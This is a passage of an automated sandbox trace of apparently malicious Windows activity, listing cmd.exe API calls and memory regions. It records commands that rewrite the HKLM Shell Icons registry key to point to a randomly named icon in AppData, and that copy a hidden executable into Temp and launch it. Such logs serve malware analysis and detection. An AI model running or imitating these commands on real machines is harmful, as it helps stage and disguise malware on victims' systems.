nSize=0x2000 | out: lpBuffer="") returned 0x0 [0114.880] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0114.880] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0114.880] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0114.880] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0114.880] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0114.880] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0114.880] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0114.880] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0114.880] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1af9b0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0114.881] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1af9b0, lpFilePart=0x1af9ac | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1af9ac*="Desktop") returned 0x18 [0114.881] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0114.881] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1af72c | out: lpFindFileData=0x1af72c) returned 0x290b68 [0114.881] FindClose (in: hFindFile=0x290b68 | out: hFindFile=0x290b68) returned 1 [0114.881] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1af72c | out: lpFindFileData=0x1af72c) returned 0x290b68 [0114.881] FindClose (in: hFindFile=0x290b68 | out: hFindFile=0x290b68) returned 1 [0114.881] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1af72c | out: lpFindFileData=0x1af72c) returned 0x290b68 [0114.881] FindClose (in: hFindFile=0x290b68 | out: hFindFile=0x290b68) returned 1 [0114.881] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0114.881] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0114.881] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0114.881] GetEnvironmentStringsW () returned 0x290388* [0114.882] FreeEnvironmentStringsW (penv=0x290388) returned 1 [0114.882] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0114.882] GetConsoleOutputCP () returned 0x1b5 [0114.882] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0114.882] GetUserDefaultLCID () returned 0x409 [0114.882] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0114.883] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1afaf0, cchData=128 | out: lpLCData="0") returned 2 [0114.883] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1afaf0, cchData=128 | out: lpLCData="0") returned 2 [0114.883] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1afaf0, cchData=128 | out: lpLCData="1") returned 2 [0114.883] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0114.883] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0114.883] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0114.883] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0114.883] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0114.883] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0114.883] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0114.883] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0114.883] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0114.883] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0114.883] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0114.884] GetConsoleTitleW (in: lpConsoleTitle=0x280a10, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0114.884] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0114.884] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0114.884] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0114.884] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0114.885] _wcsicmp (_String1="reg", _String2=")") returned 73 [0114.885] _wcsicmp (_String1="FOR", _String2="reg") returned -12 [0114.885] _wcsicmp (_String1="FOR/?", _String2="reg") returned -12 [0114.885] _wcsicmp (_String1="IF", _String2="reg") returned -9 [0114.885] _wcsicmp (_String1="IF/?", _String2="reg") returned -9 [0114.885] _wcsicmp (_String1="REM", _String2="reg") returned 6 [0114.885] _wcsicmp (_String1="REM/?", _String2="reg") returned 6 [0114.888] _wcsicmp (_String1="FOR", _String2="reg") returned -12 [0114.888] _wcsicmp (_String1="FOR/?", _String2="reg") returned -12 [0114.888] _wcsicmp (_String1="IF", _String2="reg") returned -9 [0114.888] _wcsicmp (_String1="IF/?", _String2="reg") returned -9 [0114.888] _wcsicmp (_String1="REM", _String2="reg") returned 6 [0114.888] _wcsicmp (_String1="REM/?", _String2="reg") returned 6 [0114.891] SetErrorMode (uMode=0x0) returned 0x0 [0114.891] SetErrorMode (uMode=0x1) returned 0x0 [0114.891] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x291fd0, lpFilePart=0x1af2a4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1af2a4*="Desktop") returned 0x18 [0114.891] SetErrorMode (uMode=0x0) returned 0x1 [0114.892] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0114.892] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0114.898] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0114.899] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\reg.*", fInfoLevelId=0x1, lpFindFileData=0x1af020, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1af020) returned 0xffffffff [0114.899] GetLastError () returned 0x2 [0114.899] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\reg", fInfoLevelId=0x1, lpFindFileData=0x1af020, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1af020) returned 0xffffffff [0114.899] GetLastError () returned 0x2 [0114.899] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\reg.*", fInfoLevelId=0x1, lpFindFileData=0x1af020, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1af020) returned 0x280f68 [0114.899] FindClose (in: hFindFile=0x280f68 | out: hFindFile=0x280f68) returned 1 [0114.899] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\reg.COM", fInfoLevelId=0x1, lpFindFileData=0x1af020, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1af020) returned 0xffffffff [0114.899] GetLastError () returned 0x2 [0114.899] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\reg.EXE", fInfoLevelId=0x1, lpFindFileData=0x1af020, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1af020) returned 0x280f68 [0114.899] FindClose (in: hFindFile=0x280f68 | out: hFindFile=0x280f68) returned 1 [0114.900] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0114.900] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0114.900] GetConsoleTitleW (in: lpConsoleTitle=0x1af518, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0115.059] InitializeProcThreadAttributeList (in: lpAttributeList=0x1af3a0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1af468 | out: lpAttributeList=0x1af3a0, lpSize=0x1af468) returned 1 [0115.059] UpdateProcThreadAttribute (in: lpAttributeList=0x1af3a0, dwFlags=0x0, Attribute=0x60001, lpValue=0x1af460, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1af3a0, lpPreviousValue=0x0) returned 1 [0115.059] GetStartupInfoW (in: lpStartupInfo=0x1af35c | out: lpStartupInfo=0x1af35c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0115.059] lstrcmpW (lpString1="\\reg.exe", lpString2="\\XCOPY.EXE") returned -1 [0115.061] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\reg.exe", lpCommandLine="reg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons\" /f ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x1af3fc*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="reg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons\" /f ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1af448 | out: lpCommandLine="reg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons\" /f ", lpProcessInformation=0x1af448*(hProcess=0x50, hThread=0x4c, dwProcessId=0xe1c, dwThreadId=0xe20)) returned 1 [0115.680] CloseHandle (hObject=0x4c) returned 1 [0115.680] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0115.680] GetEnvironmentStringsW () returned 0x2904f8* [0115.680] FreeEnvironmentStringsW (penv=0x2904f8) returned 1 [0115.680] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0116.411] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x1af33c | out: lpExitCode=0x1af33c*=0x0) returned 1 [0116.411] CloseHandle (hObject=0x50) returned 1 [0116.411] _vsnwprintf (in: _Buffer=0x1af484, _BufferCount=0x13, _Format="%08X", _ArgList=0x1af348 | out: _Buffer="00000000") returned 8 [0116.411] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0116.411] GetEnvironmentStringsW () returned 0x2922b8* [0116.411] FreeEnvironmentStringsW (penv=0x2922b8) returned 1 [0116.412] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0116.412] GetEnvironmentStringsW () returned 0x2922b8* [0116.412] FreeEnvironmentStringsW (penv=0x2922b8) returned 1 [0116.412] DeleteProcThreadAttributeList (in: lpAttributeList=0x1af3a0 | out: lpAttributeList=0x1af3a0) [0116.412] GetConsoleTitleW (in: lpConsoleTitle=0x1af784, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0116.412] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0116.412] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0116.412] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0116.412] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\reg.*", fInfoLevelId=0x1, lpFindFileData=0x1af020, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1af020) returned 0xffffffff [0116.412] GetLastError () returned 0x2 [0116.412] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\reg", fInfoLevelId=0x1, lpFindFileData=0x1af020, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1af020) returned 0xffffffff [0116.412] GetLastError () returned 0x2 [0116.413] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\reg.*", fInfoLevelId=0x1, lpFindFileData=0x1af020, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1af020) returned 0x28e558 [0116.413] FindClose (in: hFindFile=0x28e558 | out: hFindFile=0x28e558) returned 1 [0116.413] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\reg.COM", fInfoLevelId=0x1, lpFindFileData=0x1af020, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1af020) returned 0xffffffff [0116.413] GetLastError () returned 0x2 [0116.413] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\reg.EXE", fInfoLevelId=0x1, lpFindFileData=0x1af020, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1af020) returned 0x28e558 [0116.413] FindClose (in: hFindFile=0x28e558 | out: hFindFile=0x28e558) returned 1 [0116.413] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0116.413] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0116.413] GetConsoleTitleW (in: lpConsoleTitle=0x1af518, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0116.413] InitializeProcThreadAttributeList (in: lpAttributeList=0x1af3a0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1af468 | out: lpAttributeList=0x1af3a0, lpSize=0x1af468) returned 1 [0116.413] UpdateProcThreadAttribute (in: lpAttributeList=0x1af3a0, dwFlags=0x0, Attribute=0x60001, lpValue=0x1af460, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1af3a0, lpPreviousValue=0x0) returned 1 [0116.413] GetStartupInfoW (in: lpStartupInfo=0x1af35c | out: lpStartupInfo=0x1af35c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0116.413] lstrcmpW (lpString1="\\reg.exe", lpString2="\\XCOPY.EXE") returned -1 [0116.413] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\reg.exe", lpCommandLine="reg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons\" /v \"29\" /t REG_SZ /f /d \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\Windows\\7l6OWDI9Fmrsoy1O.ico,0\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x1af3fc*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="reg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons\" /v \"29\" /t REG_SZ /f /d \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\Windows\\7l6OWDI9Fmrsoy1O.ico,0\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1af448 | out: lpCommandLine="reg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons\" /v \"29\" /t REG_SZ /f /d \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\Windows\\7l6OWDI9Fmrsoy1O.ico,0\"", lpProcessInformation=0x1af448*(hProcess=0x4c, hThread=0x50, dwProcessId=0xe48, dwThreadId=0xe4c)) returned 1 [0116.449] CloseHandle (hObject=0x50) returned 1 [0116.449] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0116.449] GetEnvironmentStringsW () returned 0x292418* [0116.449] FreeEnvironmentStringsW (penv=0x292418) returned 1 [0116.449] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0117.146] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x1af33c | out: lpExitCode=0x1af33c*=0x0) returned 1 [0117.146] CloseHandle (hObject=0x4c) returned 1 [0117.146] _vsnwprintf (in: _Buffer=0x1af484, _BufferCount=0x13, _Format="%08X", _ArgList=0x1af348 | out: _Buffer="00000000") returned 8 [0117.147] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0117.147] GetEnvironmentStringsW () returned 0x292418* [0117.147] FreeEnvironmentStringsW (penv=0x292418) returned 1 [0117.147] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0117.147] GetEnvironmentStringsW () returned 0x292418* [0117.147] FreeEnvironmentStringsW (penv=0x292418) returned 1 [0117.147] DeleteProcThreadAttributeList (in: lpAttributeList=0x1af3a0 | out: lpAttributeList=0x1af3a0) [0117.147] _get_osfhandle (_FileHandle=1) returned 0x7 [0117.147] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0117.147] _get_osfhandle (_FileHandle=1) returned 0x7 [0117.147] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0117.147] _get_osfhandle (_FileHandle=0) returned 0x3 [0117.147] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0117.147] SetConsoleInputExeNameW () returned 0x1 [0117.147] GetConsoleOutputCP () returned 0x1b5 [0117.147] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0117.147] SetThreadUILanguage (LangId=0x0) returned 0x409 [0117.148] exit (_Code=0) Process: id = "45" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16840" os_pid = "0xd94" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"CIP_STARTED\" \"60000\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7407 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 7408 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 7409 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 7410 start_va = 0x1b0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 7411 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 7412 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7413 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 7414 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 7415 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 7416 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 7742 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 7743 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 7744 start_va = 0x80000 end_va = 0x17ffff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 7745 start_va = 0x2b0000 end_va = 0x316fff entry_point = 0x2b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7746 start_va = 0x4b0000 end_va = 0x4bffff entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 7747 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 7748 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 7749 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 7750 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 7751 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 7752 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 7753 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 7754 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 7755 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 7756 start_va = 0x320000 end_va = 0x3e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000320000" filename = "" Region: id = 7757 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 7758 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 7759 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 7760 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 7761 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 7762 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 7763 start_va = 0x4c0000 end_va = 0x5c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 7764 start_va = 0x5d0000 end_va = 0x11cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 7765 start_va = 0x11d0000 end_va = 0x1332fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011d0000" filename = "" Region: id = 7830 start_va = 0x1340000 end_va = 0x160efff entry_point = 0x1340000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 7980 start_va = 0x400000 end_va = 0x481fff entry_point = 0x400000 region_type = mapped_file name = "w588h5dn.exe" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\w588h5dn.exe") Thread: id = 73 os_tid = 0xd98 [0114.927] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2af844 | out: lpSystemTimeAsFileTime=0x2af844*(dwLowDateTime=0x81e4e760, dwHighDateTime=0x1d440a9)) [0114.927] GetCurrentProcessId () returned 0xd94 [0114.927] GetCurrentThreadId () returned 0xd98 [0114.928] GetTickCount () returned 0x27483 [0114.928] QueryPerformanceCounter (in: lpPerformanceCount=0x2af83c | out: lpPerformanceCount=0x2af83c*=17171676450) returned 1 [0114.928] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0114.928] __set_app_type (_Type=0x1) [0114.928] __p__fmode () returned 0x76b331f4 [0114.928] __p__commode () returned 0x76b331fc [0114.928] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0114.928] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0114.928] 